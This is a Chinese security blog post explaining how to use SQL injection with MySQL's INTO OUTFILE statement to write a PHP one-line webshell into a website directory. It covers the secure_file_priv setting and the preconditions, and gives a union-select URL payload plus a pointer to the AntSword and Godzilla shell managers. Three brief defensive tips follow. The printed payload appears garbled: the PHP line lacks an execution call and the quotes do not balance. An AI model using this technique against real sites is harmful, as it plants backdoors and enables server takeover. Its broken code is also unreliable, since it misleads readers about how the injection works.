sql注入之into outfile语句写入一句话木马

1、漏洞介绍

into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;
当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制。

2、必备条件

1)要有secure_file_priv权限

2)知道网站绝对路径(可以通过报错信息、phpinfo界面、404界面等一些方式知道)

3)要能用union

4)对web目录有写权限

5)select <?php @($_POST['xx']);?> into outfile "绝对路径/文件名"

3、实验步骤

1)?id=xx union select 1,2,"<?php @($_POST['xx']);?> into outfile "文件路径"--+

2)蚁剑、哥斯拉连接即可

4、防御
1)数据库连接账号不要用root权限

解释:黑客获取root权限可以对服务器进行操作,最高权限造成了拥有所有可以操作的权限,对任意终端操作。
2)php关闭报错模式

解释:关闭报错模式无法获取数据库配置文件路径,没有路径就会降低攻击,只能另寻他法。
3)mysql账户没有权限向网站目录写文件

解释:限制文件写入的目录和文件类型,避免恶意用户写入危险的文件

  • 45
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

南棋网络安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值